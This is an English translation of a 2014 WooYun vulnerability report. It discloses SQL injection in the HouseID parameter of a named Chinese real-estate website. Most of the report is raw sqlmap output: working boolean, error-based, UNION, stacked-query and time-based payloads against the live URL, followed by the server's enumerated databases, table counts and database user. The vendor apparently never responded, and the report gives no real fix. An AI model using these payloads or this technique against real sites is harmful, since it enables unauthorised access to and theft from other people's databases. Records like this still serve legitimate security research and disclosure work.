
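Vulnerability summary

Report ID: wooyun-2014-064875

Vulnerability title: SQL injection in 二泉房产网 affecting multiple databases and tables

Affected vendor: 二泉房产网

Reported by: 追逐天堂

Submitted: 2014-06-14 18:11

Fixed: 2014-07-29 18:12

Published: 2014-07-29 18:12

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 12

Vulnerability status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]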



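Vulnerability details

Disclosure status:

2014-06-14: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2014-07-29: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

"New bathhouse just opened, special offer!" "What's the price?" "10 for the men's bath, 100 for the women's bath." "Why such a big difference between men's and women's?!" "Well, sir, which one would you like to enter?"

Detailed description:

Injection URL:

http://house.wst.cn/NewHouse/ShowJiage.asp?HouseID=951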



Proof of vulnerability:

sqlmap identified the following injection points with a total of 49 HTTP(s) requests:
---
Place: GET
Parameter: HouseID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: HouseID=951 AND 8143=8143
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: HouseID=951 AND 9665=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (9665=9665) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: HouseID=951 UNION ALL SELECT NULL,CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+CHAR(75)+CHAR(78)+CHAR(65)+CHAR(70)+CHAR(68)+CHAR(80)+CHAR(108)+CHAR(112)+CHAR(86)+CHAR(89)+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: HouseID=951; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: HouseID=951 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: HouseID=(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3118=3118) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113))
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [14]:
[*] baby
[*] efs
[*] Financial
[*] hongdun
[*] master
[*] model
[*] msdb
[*] tempdb
[*] women
[*] wst_edu
[*] wst_house
[*] wst_pet
[*] wxfulian
[*] wxjiaju
current user is DBA: False
current database: 'wst_house'
current user: 'wst_house'
Database: wst_house
[156 tables]
Database: efs
[36 tables]
Database: master
[289 tables]
Database: msdb
[9 tables]

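Fix:

You know better than I do...

Copyright notice: when reposting, please credit the source 追逐天堂@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused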

